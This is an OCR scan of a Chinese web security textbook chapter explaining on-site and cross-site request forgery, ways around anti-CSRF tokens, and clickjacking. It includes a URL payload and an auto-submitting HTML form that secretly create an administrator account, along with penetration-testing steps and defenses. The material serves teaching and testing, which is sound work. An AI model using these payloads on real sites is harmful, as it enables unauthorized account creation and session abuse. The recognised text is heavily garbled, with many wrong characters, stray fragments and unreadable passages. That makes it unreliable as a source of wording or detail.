程 中 ,攻击 者 截获 一 名 用 户 的 会 话 令 牌 因而 能 够 “作为 ”该 用 户 使 用 应 用 程序 。 但 是 ,通过 请 
求 伪造 ， 攻 击 者 根本 不 需要 知道 受害 者 的 会 话 令 有 牌 。 相 反 ， 攻 击 者 利用 Web 浏 览 右 的 正常 行为 动 
手 用 户 的 令 牌 ， 并 通过 它 提出 用 户 并 不 打算 提出 的 请 求 。 

请 求 伪 造 漏洞 分 为 两 种 类 型 . 本 站 点 和 跨 站 点 。 

1. 本 站 点 请 求 伪 造 

本 站 点 请 求 伪 造 ( On-Site Request Forgery，OSRF ) 是 一 种 利用 保存 型 XSS 汤 洞 的 常见 攻击 
有 效 载 傈 。 在 上 一 章 介绍 的 MySpace 旺 虫 示例 中 , 一 位 名 叫 Samy 的 用 户 在 目 己 的 用 户 资料 中 插入 
一 段 脚 本 ， 致 使 任何 查看 其 资料 的 用 户 在 不 知情 的 情况 下 执行 各 种 操作 。 另 外 ， 即 使 在 XSS 漏 洞 
并 不 存在 的 地 方 ， 保 存 型 OSRF 漏 洞 仍 有 可 能 存在 ， 这 点 稼 被 人 们 忽视 。 
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以 消 朋 公告 牌 应 用 程序 为 例 , 它 允 许 用 户 提 交 可 被 其 他 用 户 查 看 的 数据 。 该 应 用 程序 使 用 以 
下 请 求 提交 消息 : 
POST /submit.php 


Host: wahh-app. com 
Content-Length: 34 


type=gquestion&name=dafé&message=fooc 
这 个 请 求 将 以 下 内 容 添 加 到 消息 页 面 中 : 
< 七 荆 > 
<td><img src="/images/question.gif"></td> 
<td>daf</td> 
<td>foo</td> 


</tr> 

在 这 种 情况 下 ,测试 员 当 然 会 测试 其 中 是 否 存 在 XSS 汤 洞 。 但 是 , 假设 应 用 程序 对 插入 页 面 
中 的 任何 "、< 和 > 字符 进行 了 正确 的 HTML 编 码 。 如 采 对 这 种 防御 方法 感到 满意 ， 觉 得 攻击 者 无 
论 如 何 也 无 法 避 开 它 ， 测 试 员 就 会 继续 进行 下 一 步 测试 。 

但 是 ， 稍 等 。 我 们 控制 的 仅仅 是 <img> 标 签 目 标的 一 部 分 内 容 。 虽 然 我 们 无 法 破坏 引用 字符 
串 ， 但 是 可 以 修改 URL,， 使 得 查看 消息 的 任何 用 户 提出 任意 一 个 本 站 点 GET 请 求 。 例 如 ,在 type 
参数 中 提交 下 面 的 值 将 会 使 任何 查看 消息 的 用 户 提 出 一 个 尝试 创建 新 的 管理 用 户 的 请 求 : 

. .V/admin/mnewUser .php?username=daf2&password=0wned&role=admin# 

如 果 一 名 普通 用 户 被 诱 使 提出 攻击 者 专门 设计 的 请 求 ， 攻击 当 然 不 会 成 功 。 但 是 ， 如果 管理 
员 查 看 消息 ,攻击 者 就 可 以 建立 一 个 秘密 账户 。 上 面 的 示例 证 明 ， 即 使 无 法 实施 XSS 攻 击 , 但 攻 
击 者 仍然 能 够 成 功 执行 OSRF 攻 击 。 当 然 ， 即 使 省 理 员 来 取 了 防 疙 措施， 禁用 了 JavaScript， 攻 击 

注意 ， 在 前 面 的 攻击 字符 串 中 ，# 符 终止 了 .gif 后 级 前 面 的 URL。 但 是 ， 只 需 在 后 级 前 插入 一 
个 &&， 构 成 男 外 一 个 请 求 参 数 ， 即 可 解决 以 上 问题 。 






































党 试 访问 
在 以 下 示例 中 ， 可 以 将 OSRF 有 效 载 何 放 在 最 近 的 搜索 列表 中 ， 即 使 其 并 不 易于 受到 XSS 


攻击 : 
http://mdsec.net/search/77/ 





渗透 测试 步 又 


(1) 如 宁 一 名 用 户 提 区 的 数据 在 菜 个 位 置 显 示 给 其 他 用 户 ， 但 测试 员 仍 然 无 法 实施 保存 型 











XSS 攻 击 ， 那 么 在 每 个 这 样 的 位 置 ， 检 查 应 用 程序 的 行为 是 否 使 得 它 易 于 受到 OSRF 攻 击 。 
(2) 用 户 提 交 的 数据 被 搬入 到 超 链 接 目 标 或 返回 页 面 中 的 其 他 URL 等 位 置 时 往往 会 出 现 漏 
洞 。 除 非 应 用 程序 特别 阻止 要 求 的 任何 字符 ( 通 第 包括 点 、 和 斜 线 及 查询 子 符 串 中 的 分 隔 符 )， 
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否则 它 肯 定 多 于 受到 攻击 。 
(3) 如 东 发 现 OSRF 漏 洞 ， 则 应 寻找 一 个 适当 的 请 求 作为 利用 目标 ， 如 下 一 他“ 路 站 点 请 求 
伪造 ”所 述 。 








在 将 其 合并 到 啊 应 中 之 前 ，, 尽 可 能 严格 地 确认 用 户 提交 的 输入 ， 即 可 防止 OSRF 源 洞 。 例如， 
在 前 面 的 示例 中 ， 应 用 程序 可 能 会 检查 type 参 数 中 是 否 有 一 组 值 中 的 某 一 个 特殊 的 值 。 如 采 应 
用 程序 必须 接受 无 法 预料 的 其 他 值 ， 那 么 应 阻止 任何 包含 / .\ ? & 与 = 的 请 求 。 

注意 ， 对 这 些 字 符 进 行 HITML 编 码 并 不 能 有 效 防 止 OSRF 攻 击 ， 因 为 浏览 厅 在 请 求 目 标 URL 
字符 串 之 前 ， 会 首先 对 其 进行 解码 。 

根据 插入 点 与 周围 环境 的 不 同 , 使 用 与 下 一 市 描述 的 防止 CSRF 攻 击 时 使 用 的 同 种 防御 方法 ， 
也 可 以 防止 OSRF 攻 击 。 

2. 跨 站 点 请 求 伪 造 

在 跨 站 点 请 求 伪 造 (CSRF ) 攻击 中 ， 攻 击 者 只 需 创建 一 个 看 似 无 害 的 网 站 ， 致 使 用 户 的 浏 
览 融 直接 回 吻 受 攻击 的 应 用 程序 提交 一 个 请 求 ， 执 行 示 种 有 利于 攻击 者 的 “无 意 ” 操 作 。 

如 前 所 述 ， 同 源 策 略 并 不 阻止 一 个 网 站 回 另 一 个 瑾 提出 请 求 。 但 是 ， 它 确实 阻止 提出 请 求 的 
网 站 处 理 跨 域 请 求 的 啊 应 。 因 此 ， 正 常情 况 下 ，CSRF 攻 击 只 是 一 种 “ 单 问 ”攻击 。 所 以 ， 在 纯 
粹 的 CSRF 攻 击 中 ， 要 想 实施 如 Samy XSS 蠕 虫 中 的 多 阶段 操作 ， 从 啊 应 中 读 取 数据 并 将 其 合并 到 
随后 的 请 求 中 , 将 很 难 实现 。( 我 们 将 在 本 章 后 面部 分 介绍 如 何 对 利用 CSRF 技 巧 的 某 些 方法 进行 
扩展 ， 以 执行 有 限 的 双向 攻击 ， 跨 域 获 取 数 据 。) 

以 某 个 允许 管理 员 使 用 以 下 请 求 创 建新 用 户 账户 的 应 用 程序 为 例 : 

POST /auth/390/NewUserStep2.ashx HTTP/1.1 

Host: mdsec.net 

Cookie: SessionId=8299BE6B260193DA076383A2385B0O7B9 


Content-Type: application/x-—-www-form-urlencoded 
Content-Length: 83 









































realname-daf&username-daf&userrole-admin&password=letmeinlg& 


confirmpassword=letmeinl 
此 请 求 有 3 个 主要 特点 导致 它 易于 受到 CSRF 攻 击 。 
口 该 请 求 执行 特权 操作 。 在 上 述 示例 中 ， 该 请 求 使 用 管理 员 权 限 创建 了 一 个 新 用 户 。 
口 应 用 程序 仅仅 依靠 HTTP cookie 来 追踪 会 话 。 请 求 中 的 任何 其 他 位 置 均 未 传送 会 话 相 关 的 
令 牌 。 
口 攻击 者 可 以 确定 执行 操作 所 需 的 所 有 参数 。 除 cookie 中 的 会 话 令 牌 外 ,请求 中 不 需要 包含 
任何 无 法 预测 的 值 。 
针对 这 些 特 点 表现 出 的 缺陷 ,攻击 者 可 以 构建 一 个 Web 页 面 ， 回 易 受 攻击 的 应 用 程序 提出 一 
个 跨 域 请 求 ， 在 其 中 包含 执行 特权 操作 所 需 的 所 有 步骤 。 以 下 为 这 种 攻击 的 一 个 示例 : 
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<html> 

<body> 

<form action="https://mdsec.net/auth/390/NewUserStep2.ashx" 
method="POST"> 

<input type="hidden" name="realname" value="daf"> 

<input type="hidden" name="username" value="daf"> 

<input type="hidden" name="userrole" value="admin'"> 





<input type="hidden" name="password" value="letmeinl'"> 








<input type="hidden" name="confirmpassword" value="letmeinl"> 
</form> 

<SCript> 

document.forms [0] .submit!(): 

</Script> 

</body> 

</html> 


该 攻击 将 所 有 请 求 参 数 放 入 隐藏 表单 字段 中 ,并 包含 一 段 用 于 自动 提交 表单 的 脚本 。 用 户 的 
浏览 硕 提 交 此 表单 时 , 将 目 动 添加 用 户 的 目标 域 的 cookie, 并 且 应 用 程序 会 正常 处 理 生 成 的 请 求 。 
如 果 管 理 用 户 登 录 到 吻 受 攻击 的 应 用 程序 ， 并 访问 攻击 者 的 包含 此 表单 的 Web 页 面 ， 该 请 求 将 在 
管理 员 的 会 话 中 处 理 ， 攻 击 者 的 账户 因此 得 以 创建 。 


尝试 访问 


http://mdsec.net/auth/390/ 














2004 年 , Dave Armstrong 在 eBay 应 用 程序 中 发 现 了 一 个 典型 CSRF 漏 洞 。 攻击 者 可 以 设计 一 个 
URL, 使 得 请 求 这 个 URL 的 用 户 对 某 个 拍卖 品 给 出 任 音标 价 。 某 个 第 三 方 网 站 可 以 诱 使 访问 者 请 
求 这 个 URL， 以 致 于 任何 访问 这 个 网 站 的 eBay 用 户 都 会 报 出 一 个 标价 。 而 且 ， 进 行 调 整 后 ,我 们 
还 可 以 在 同一 eBay 应 用 程序 的 一 个 保存 型 OSRF 攻 击 中 利用 这 个 漏洞 。 应 用 程序 允许 用 户 在 拍卖 
品 描述 中 插入 <img> 标 签 。 为 防止 攻击 ， 应 用 程序 确认 标签 目标 返回 了 真正 的 图 像 文件 。 但 是 ， 
攻击 者 也 可 以 在 上 述 位 置 插入 一 个 指 问 站 外 服务 各 的 链接 ( 它 在 创建 拍卖 品 时 返回 一 幅 合法 的 图 
像 )， 并 随后 用 一 个 返回 他 专门 设计 的 CSRF URL 的 HTTP 重 定向 代替 这 个 链接 。 因 此 ， 任 何 查 看 
担 卖 品 的 用 户 都 会 在 不 知情 的 情况 下 给 出 一 个 标价 。 和 欲 知 攻 击 详情 ， 请 查阅 最 初 在 Bugtraq 上 发 
表 的 文章 : 

http://archive.cert.uni-stuttgart.de/bugtraq/2005/04/msg00279.html 






































注解 应 用 程序 确认 站 外 图 像 方面 的 漏洞 称 为 “检查 时 间 ， 使 用 时 间 ”( TOCTOU ) 漏 
洞 。 因 为 某 个 数据 在 一 个 时 间 确 认 ， 却 在 另 一 个 时 间 使 用 ， 奸 致 攻击 者 能 够 在 这 两 个 





时 间 的 间隔 内 修改 该 数据 的 值 。 


® 1 U CSREUD 
CSRF 漏 洞 主要 出 现在 应 用 程序 仅 依 赖 HTTP cookie 追 踪 会 话 令 牌 的 情况 下 。 一 旦 应 用 程序 已 








出 
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经 在 用 户 的 浏览 带 中 设 定 了 cookie， 浏 览 带 会 日 动 在 随后 的 每 个 请 求 中 将 这 个 cookie 提 交 给 应 用 
程序 。 无 论 请 求 是 源 目 某 个 链接 、 应 用 程序 本 号 中 的 表单 或 任何 其 他 地 方 (如 外 部 网 站 或 在 电子 
邮件 中 单 击 的 链接 ), 它 都 会 这 样 做 。 如 采 应 用 程序 未 采取 防范 措施 来 阻止 攻击 者 以 这 种 方式 “ 芋 























置 ” 它 的 用 户 的 会 话 ， 它 就 易于 受到 CSRF 攻 击 。 





渗透 测试 步 又 

(1) 根据 在 应 用 程序 解析 过 程 中 得 到 的 结果 ( 请 参阅 第 4 章 了 解 相 关内 容 )， 检 查 应 用 程序 
的 关键 功能 。 

(2) 找到 一 项 可 用 于 代表 不 知情 的 用 户 执行 某 种 敏感 操作 的 应 用 程序 功能 ， 该 功能 仅 依赖 
cookie 来 追踪 用 户 会 话 ， 并 且 使 用 攻击 者 能 够 提前 决定 的 请 求 参数 ， 也 就 是 说 ， 其 中 并 不 包含 
任何 会 话 令 牌 或 其 他 无 法 预测 的 数据 。 

(3) 创建 一 个 HIML 页 面 ， 它 不 需要 进行 任何 用 户 交 互 即 可 提出 所 需 请 求 。 对 于 GET 请 求 ， 
可 以 使 用 <img> 标 签 ， 并 通过 src 参 数 设 置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 表 
单 ， 其 中 包含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ,并 将 其 目标 设置 为 易 受 攻击 的 URL。 可 
以 使 用 JavaScript 在 页 面 加 载 时 目 动 提交 该 表单 。 

(4) 登录 应 用 程序 后 ， 使 用 同一 个 浏览 费 加 载 专门 设计 的 HTML 页 面 。 确认 应 用 程序 是 否 
执行 所 需 操 作 。 






































提示 由 于 引入 了 其 他 攻击 向 量 ，CSRF 攻 击 的 可 能 性 改变 了 许多 其 他 类 型 的 漏洞 的 影 
Y 响 范 围 。 例 如 ， 如 果 某 项 管理 功能 接受 参数 中 的 用 户 标识 符 ， 然 后 显示 与 指定 用 户 有 
关 的 信息 。 该 功能 受到 严格 的 访问 控制 ,但 它 的 uidq 参 数 中 包含 SQL 注入 漏洞 。 由 于 应 
用 程序 管理 员 为 可 信用 户 , 并 且 在 任何 情况 下 都 能 够 完全 控制 数据 库 , 因此 , 这 种 SQL 


注入 漏洞 被 认为 风险 较 低 。 但 是 ， 由 于 该 功能 并 不 执行 任何 管理 操作 (根据 最 初 的 设 
计 )， 因 此 其 并 未 采取 防范 CSRF 的 措施 。 从 攻击 者 的 角度 看 ， 该 功能 与 专门 供 管理 员 
执行 任意 SQL 查询 的 功能 一 样 重要 。 如 果 可 以 注入 一 个 执行 某 种 敏感 操作 ， 或 通过 带 
外 通道 检索 数据 的 查询 ， 那 么 即使 是 非 管理 用 户 也 可 以 通过 CSRF 实 施 这 种 攻击 。 








® DD CSRF 
由 于 实施 CSRF 攻 击 需 要 在 受害 用 户 的 会 话 中 执行 茶 种 特权 操作 ， 因 此 ， 在 实施 攻击 时 ， 用 
户 需 要 登录 到 应 用 程序 。 





一 个 存在 大 量 危 险 的 CSRF 漏 洞 的 位 置 , 是 家 庭 DSL 路 由 器 使 用 的 Web 界 面 。 这 些 设备 大 多 包 
含 敏感 功能 ， 如 打开 面向 互联 网 的 防火 墙 上 的 所 有 端口 。 由 于 这 些 功能 通常 并 未 采取 防范 CSRF 
的 措施 ,并且 多 数 用 户 也 没有 修改 设备 的 默认 内 部 耳 地 址 ， 因 此， 它们 易于 受到 由 恶意 外 部 站 点 
传送 的 CSRF 攻 击 。 但 是 ， 相 关 设备 通常 需要 进行 验证 才能 执行 敏感 操作 ， 而 且 许多 用 户 并 未 合 
录 他 们 的 设备 。 
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如 果 设 备 的 Web 界 面 使 用 基于 表单 的 验证 ， 则 可 以 通过 首先 使 用 户 登 录 设备 ， 然 后 执行 经 过 
验证 的 操作 ， 从 而 实施 两 步 攻击 。 由 于 大 多 数 用 户 并 未 修改 这 类 设备 的 默认 证 书 〈 可 能 认为 该 
Web 界 面 只 能 通过 内 部 家 庭 网 络 访问 )， 因 此 ， 攻 击 者 的 网 页 可 以 首先 提出 包含 默认 证 书 的 登录 
请 求 。 然 后 ,设备 会 在 用 户 的 浏览 问 中 设置 一 个 会 话 令 牌 ,随后 的 任何 请 求 ,， 包括 由 攻击 者 生成 
的 请 求 ， 将 目 动 传送 该 令 脾 。 

在 其 他 情况 下 , 攻击 者 可 能 需要 受害 用 户 以 攻击 者 目 身 的 用 户 账 户 登 录 应 用 程序 才能 实施 特 
定 的 攻击 。 以 一 个 允许 用 户 上 传 并 存储 文件 的 应 用 程序 为 例 。 这 些 文 件 随 后 可 以 进行 下 载 ， 但 只 
能 由 上 传 它们 的 用 户 下 载 。 假设 由 于 没有 对 文件 内 容 进 行 过 小 ,该 功能 可 用 于 实施 保存 型 XSS 攻 
击 〈 请 参阅 第 12 音 了 解 相关 内 容 )。 该 漏洞 似乎 并 不 会 造成 任何 伤害 ， 因 为 攻击 者 只 能 用 它 来 攻 
击 上 自己 。 但 实际 上 ， 通 过 使 用 CSRF 技 巧 ， 攻 击 者 可 以 利用 保存 型 XSS 漏 洞 来 攻破 其 他 用 户 。 如 
上 文 所 述 ， 攻击 者 的 网 页 可 以 提出 一 个 CSRF 请 求 ， 强 制 受害 用 户 使 用 攻击 者 的 证 书 登 录 。 然 后 ， 
攻击 者 的 网 页 可 以 提出 另 一 个 CSRF 请 求 ， 以 下 载 某 个 恶意 文件 。 用 户 的 浏览 大 处 理 该 文件 时 ， 
攻击 者 的 XSS 有 将 载 向 将 会 执行 ,用户 在 易 受 攻击 的 应 用 程序 中 的 会 话 将 被 攻破 。 虽 然 受 害 者 当 
前 是 使 用 攻击 者 的 账户 登录 的 ,但 是 ,攻击 并 未 就 此 结束 。 如 第 12 曹 所 述 ，XSS 有 效 载 向 可 以 在 
用 户 的 浏览 锅 中 持续 存在 , 并 执行 任意 操作 , 因而 可 以 让 用 户 注 销 其 在 易 受 攻击 的 应 用 程序 中 的 
会 话 ， 并 诱 使 其 使 用 自己 的 证 书 登 录 。 

® [| [CSRFL UO 

由 于 浏览 器 自动 在 随后 的 每 个 请 求 中 将 cookie 返 回 给 发 布 cookie 的 Web 服 务 器 ，CSRF 漏 洞 
此 产生 。 如 果菜 个 Web 应 用 程序 主要 依赖 HTTP cookie 传 送 会 话 令 牌 ， 那 么 它 本 身 就 易于 受到 这 
种 攻击 。 

防范 CSRF 攻 击 的 标准 方法 ， 是 将 HTTP cookie 与 其 他 追踪 令 牌 的 方法 相 结 合 。 这 类 方法 通 篆 
采用 其 他 通过 HTTP 隐 蔬 表 单字 段 传输 的 令 牌 。 在 每 次 提交 请 求 时 ， 应 用 程序 除 确认 会 话 cookie 
外 , 还 核实 表单 是 否 传送 了 正确 的 令 牌 。 如 果 攻 击 者 无 法 确定 该 令 牌 的 值 , 就 无 法 构建 路 域 请 求 ， 
也 就 无 法 执行 所 需 的 操作 。 
























































注解 ”本 章 后 面部 分 将 介绍 ， 即 使 使 用 CSRF 令 牌 受到 可 靠 保护 的 功能 也 可 能 易于 受 


到 用 户 界 面 (UI) 伪装 攻击 。 





以 这 种 方式 使 用 反 CSRF 令 牌 时 ， 必 须 为 这 些 令 牌 提供 与 正常 的 会 话 令 牌 相同 的 保护 。 如 宁 
攻击 者 能 够 预测 发 布 给 其 他 用 户 的 令 牌 值 ， 他 吏 能 够 确定 提出 CSREF 请 求 所 需 的 所 有 参数 ， 因 而 
仍然 能 够 实施 攻击 。 此 外 ， 如 宁 反 CSRF 令 牌 未 与 所 属 用 己 的 会 话 相 关联 ， 攻 击 者 就 可 以 在 自己 
的 会 话 中 获得 一 个 有 效 令 牌 ， 并 将 此 令 牌 用 在 针对 其 他 用 户 的 会 话 的 CSRF 攻 击 中 。 


党 试 访问 
http://mdsec.net/auth/395/ 
http://mdsec.net/auth/404/ 
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by 


和 


一 些 应 用 程序 使 用 相对 较 短 的 反 CSRF 令 牌 ， 可 能 因为 认为 这 些 令 牌 不 会 像 较 短 
会 话 令 牌 一 样 受 到 变 力 攻击 。 任 何 向 应 用 MO 量 可 能 值 的 攻击 都 需要 通过 受 
的 浏览 器 传送 这 些 值 ， 包 括 提 交大 量 可 能 被 轻易 察觉 的 请 求 。 此 外 ， 如 果 收 到 太 
效 的 反 CSREF 令 牌 ,应 用 程序 可 能 会 防御 ， a 户 的 会 话 , 从 而 阻止 相关 攻击 。 
是 ， 这 种 防御 忽略 了 纯粹 在 客户 端 实施 的 变 力 攻击 ， 而 不 向 服务 器 发 送 任何 请 求 的 
可 能 性 。 在 某 些 情况 下 ， 可 以 通过 使 用 基于 CSS 的 技巧 来 枚 举 用 户 的 浏览 历史 记录 ， 
从 而 实施 这 种 攻击 。 要 想 成 功 实施 这 类 攻击 ， 必 须 满足 以 下 两 个 条 件 : 
AN 
生 ， 因 为 许多 受 保护 的 功能 通过 目标 URL 中 包含 令 牌 的 简单 超 链接 即 可 访问 。 
口 应 用 程序 必须 在 整 ed 次 使 用 同 
一 个 令 牌 。 这 种 情况 也 经 常 发 生 ， 一 方面 是 为 了 改善 用 户 的 使 用 体验 ， 另 一 方 
面 是 为 了 便于 使 用 浏览 器 的 “后 退 和 “前 进 ”按钮 。 
如 果 满 足 这 些 条 件 ,， 并 且 目 标 用 户 已 访问 菜 个 包含 反 CSRF 令 牌 的 URL, 攻击 者 就 
可 以 从 自己 的 页 面 实 施 变 力 攻击 。 这 时 ,攻击 者 页 面 上 的 一 段 脚本 将 动态 创建 指向 目 
标 应 用 程序 上 的 相关 URL 的 超 链 接 ， 同 时 在 每 个 链接 中 包括 一 个 不 同 的 反 CSRF 令 牌 
值 。 然 后 ， 该 脚本 使 用 JavaScript API getComputedStyle 测 试用 户 是 否 访 问 了 上 述 链 
接 。 确定 某 个 被 访问 的 链接 后 ， 即 可 发 现 一 个 有 效 的 反 CSRF 令 牌 ， 然后 ,攻击 者 的 页 
面 将 其 用 于 代表 用 户 执行 敏感 操作 。 


NS 啊 候 趴 


本 六 








A en J 了 敏感 操作 并 不 够 。 例 如 ， 管 理 
员 在 添加 新 用 户 账户 时 , 他 可 能 会 在 第 一 阶段 输入 相关 信息 , 然后 在 第 二 阶段 检查 并 确认 这 些 信 
A ee an te 
交 两 个 所 需 的 请 求 ， ee 

少数 情况 下 ， 应 用 程序 功能 会 采用 男 一 个 令 牌 ; 它 在 一 个 啊 应 中 设置 该 令 牌 ， 然 后 在 接 下 来 
的 请 求 中 提交 该 令 牌 。 本 可 重 定向 ， 因 此 应 用 程序 采用 的 防御 
机 制 可 能 会 失效 。 虽 然 CSRF 属 于 单 向 攻击 ,并 且 无 法 从 应 用 程序 的 响应 中 读 取 令 牌 ,但 如 果 CSRF 
响应 包含 重 定 问 ,而 且 该 重 定 问 指 问 其 他 包含 令 牌 的 URL , 受害 者 的 浏览 融 将 目 动 访问 该 重 定 回 ， 
并 自动 在 提出 的 请 求 中 提交 令 牌 。 


尝试 访问 


http://mdsec.net/auth/398/ 









































不 要 犯 下 错误 ， 依 靠 HTITP Referet 消 息 头 来 指示 请 求 是 源 目 站 内 还 是 站 外 。Referetr 消 息 
头 可 以 使 用 旧版 Flash 进 行 修改 ， 或 用 元 刷新 标签 ( meta refresh tag ) 来 伪装 。 通 常 而 言 ， 使 用 
Referezr 消 息 头 并 不 能 为 Web 应 用 程序 提供 强大 的 安全 防御 。 
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人 们 和 常 称 ， 如 果 应 用 程序 中 包含 任何 XSS 漏 洞 ， 那 么 反 CSRF 防 御 机 制 就 可 以 被 突破 。 这 种 
说 法 并 不 完全 正确 。 但 是 ， 文 持 这 种 观点 的 思考 方法 是 正确 的 ; 因为 XSS 有 效 载 和 倚 在 本 站 执行 ， 
可 以 与 应 用 程序 进行 双 回 交互 , 所 以 它们 能 够 从 应 用 程序 的 啊 应 中 获取 令 牌 , 并 在 随后 的 请 求 中 
然而 ， 如 果 某 个 本 刁 受 到 反 CSRF 防 御 机 制 保护 的 页 面 也 包含 反射 型 XSS 漏 洞 ， 那 么 这 种 漏 
洞 并 不 能 直接 用 于 突破 防御 。 记 住 ， 在 反射 型 XSS 攻 击 中 ， 最初 的 请 求 为 跨 站 点 请 求 。 这 时 ， 攻 
击 者 会 设计 一 个 URL 或 一 个 PosT 请 求 ， 其 中 包含 随后 被 复制 到 应 用 程序 的 啊 应 中 的 恶意 输入 。 
但 是 ， 如 果 易 受 攻击 的 页 面 实 施 了 反 CSRF 防 御 ， 那 么 攻击 者 要 想 实 施 有 效 攻 击 ， 其 专门 设计 的 
请 求 中 必须 已 经 包含 必要 的 令 牌 如果 其 中 没有 所 需 令 牌 , 应 用 程序 将 会 拒绝 攻击 者 提出 的 请 求 ， 
同时 包含 反射 型 XSS 漏 洞 的 代码 路 径 也 不 会 执行 。 这 时 ， 问 题 并 不 在 于 注入 的 脚本 是 否 能 够 读 取 
应 用 程序 响应 中 的 任何 令 牌 (当然 它 能 )， 而 在 于 如 何 首 先 将 脚本 注入 到 某 个 包含 那些 令 牌 的 响 
应 中 。 
通常 ， 在 下 面 几 种 情况 下 ， 我 们 可 以 利用 XSS 漏 洞 突破 反 CSRF 防 御 。 
口 如 果 受 保护 的 功能 中 存在 任何 XSS 汤 洞 ， 那 么 攻击 者 总 可 以 利用 这 些 漏洞 突破 反 CSRF 防 
御 。 通 过 保存 型 攻击 注入 的 JavaScript 可 直接 读 取 脚本 所 在 的 应 用 程序 啊 应 中 的 令 牌 。 
口 如 果 应 用 程序 仅 对 一 部 分 通过 验证 的 功能 实施 反 CSRF 防 御 ,并 且 某 项 未 防御 CSREF 的 功能 
中 存在 一 个 反射 型 XSS 漏 洞 , 那么 攻击 者 就 可 以 利用 这 个 漏洞 来 突破 反 CSRF 防 御 。 例 如 ， 
如 果 应 用 程序 仅 采 用 反 CSREF 令 牌 保护 转账 功能 的 第 二 个 步 又， 那么 攻击 者 就 可 以 利用 反 
射 型 XSS 攻 击 从 其 他 步骤 中 突破 防御 。 通 过 这 个 漏洞 注入 的 一 段 脚 本 可 以 向 第 一 个 转账 步 
骤 提 出 一 个 站 内 请 求 ， 截 取 令 牌 ， 然 后 使 用 这 个 令 牌 进入 第 二 个 步骤 。 攻 击 之 所 以 能 够 
成 功 ， 是 因为 第 一 个 没有 采取 CSRF 防 御 的 转账 步骤 返回 了 访问 受 保护 页 面 所 需 的 令 牌 。 
仅 依 赖 HTTP cookie 实 现 第 一 个 步骤 ， 意 味 痢 攻击 者 可 以 利用 它 访 问 保护 第 二 个 步骤 的 令 
牌 ， 从 而 实施 有 效 攻击 。 
口 在 某 些 应 用 程序 中 ， 反 CSRE 令 牌 仅 与 当前 用 户 相 关联 ， 而 不 是 与 用 户 的 会 话 相 关联 。 在 
这 种 情况 下 ， 如 果 登 录 表 单 未 防范 CSRF 攻 击 ， 则 应 用 程序 仍 有 可 能 受到 多 阶段 攻击 。 首 
先 ， 攻 击 者 使 用 自己 的 账户 登录 ， 获 得 一 个 与 他 的 用 户 号 份 关 联 的 有 效 反 CSRF 令 牌 。 然 
后 ， 攻 击 者 对 登录 表单 发 动 CSRF 攻 击 ， 迫 使 受害 用 户 使 用 他 的 证 书 登录 ， 如 上 文 介绍 利 
用 相同 用 户 的 保存 型 XSS 漏 洞 时 所 述 。 一 旦 用 户 作 为 攻击 者 登录 ， 攻 击 者 将 使 用 CSRF 使 
用 户 提 出 相关 请 求 ， 对 XSS 漏 洞 加 以 利用 ， 同 时 使 用 他 此 前 获得 的 反 CSRF 令 牌 。 然 后 ， 
攻击 者 的 XSS 有 效 载 傈 将 在 用 户 的 浏览 絮 中 执行 。 由 于 用 户 仍 然 作为 攻击 者 登录 ,XSS 有 
效 载 倚 可 能 需要 使 用 户 注 销 ， 人 然后 诱 使 用 户 再 次 登录 ， 最 终 ， 用 户 的 登录 证 书 和 生成 的 
应 用 程序 会 话 都 被 完全 攻破 。 
口 如 有 末 反 CSREF 令 牌 未 与 用 户 关 联 ， 而 是 与 当前 会 话 关 联 ， 且 攻击 者 可 以 通过 某 种 方法 在 用 
户 的 浏览 右 中 注入 cookie， 则 只 需 对 以 上 攻击 稍 作 修改 即 可 (本章 后 面部 分 将 介绍 这 种 攻 
击 )。 这 时 ， 攻 击 者 不 是 使 用 自己 的 证 书 针对 登录 表单 实施 CSRF 攻 击 ， 而 可 以 直接 向 用 
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户 传送 他 当前 的 会 话 令 牌 及 与 该 会 话 关 联 的 反 CSRF 令 牌 。 然 后 ， 该 攻击 的 剩余 部 分 与 之 
前 所 述 的 步 又 相同 。 
除 这 些 情形 外 ， 在 许多 时 候 ， 人 针对 CSRF 攻 击 的 有 效 防御 能 够 在 很 大 程度 上 阻止 ( 即使 不 能 
完全 阻止 ) 攻击 者 利用 菏 些 反射 型 XSS 源 洞 。 但 是 , 在 任何 情况 下 ,无论 我 们 采取 了 何 种 反 CSRF 
防御 来 阻止 攻击 者 试图 利用 XSS 条 件 ， 我 们 部 应 始终 修复 应 用 程序 中 存在 的 任何 这 类 XSS 条 件 。 




















13.1.2 ”UI 伪装 


基本 上 ， 与 页 面 中 的 令 牌 有 关 的 反 CSRF 防 御 理 在 确保 请 求 是 由 应 用 程序 中 的 用 户 操作 本 号 
提出 的 ， 而 不 是 由 菏 个 第 三 方 域 诱发 的 。 即 使 采用 了 反 CSRF 令 脾 ， 第 三 方 站 点 仍然 可 以 通过 UI 
伪装 攻击 诱 使 其 他 域 中 的 用 户 执 行 操 作 。 在 某 种 程度 上 ,这 类 攻击 之 所 以 能 够 成 功 ,， 是 因为 生成 
的 请 求实 际 上 来 日 攻击 者 针对 的 应 用 程序 。UI 伪 闭 技 巧 通常 也 称 为 “点 击 动 持 ”( clickjacking )、 
“ 键 击 劫持 ”( strokejacking ) 等 其 他 稼 见 说 法 。 

基本 上 ， 在 UI 伪装 攻击 中 ， 攻 击 者 的 网 页 会 将 目标 应 用 程序 加 载 到 其 页 面 上 的 iframe 中 。 
而 实际 上 , 攻击 者 会 用 其 他 界面 覆盖 上 日 标 应 用 程序 的 界面 。 攻击 者 的 界面 中 包含 吸引 用 户 并 诱 使 
其 执行 各 种 操作 ( 如 在 页 面 的 特定 区 域 单 击 女 标 ) 的 内 容 。 用 户 执行 这 些 操 作 时 ,虽然 看 起 来 其 
单 击 的 是 攻击 者 的 界面 中 显示 的 按钮 和 其 他 UI 元 条 ,但 他 实际 上 是 在 不 知情 的 情况 下 与 攻击 者 所 
针对 的 应 用 程序 进行 交互 。 

以 一 个 分 两 步 进行 转账 的 银行 功能 为 例 。 在 第 一 步 中 , 用户 提 交 转 账 信 息 。 对 此 请 求 的 啊 应 
将 显示 这 些 信 息 ， 以 及 一 个 用 于 确认 该 操作 并 进行 转账 的 按钮 。 此 外 ， 为 防止 CSRF 攻 击 ， 啊 应 
中 的 表单 还 包含 一 个 隐藏 字段 ， 其 中 提供 了 一 个 无 法 预测 的 令 牌 。 此 令 牌 在 用 户 单 击 “ 确 认 ” 时 
提交 ， 应 用 程序 将 在 转账 之 前 验证 它 的 值 。 

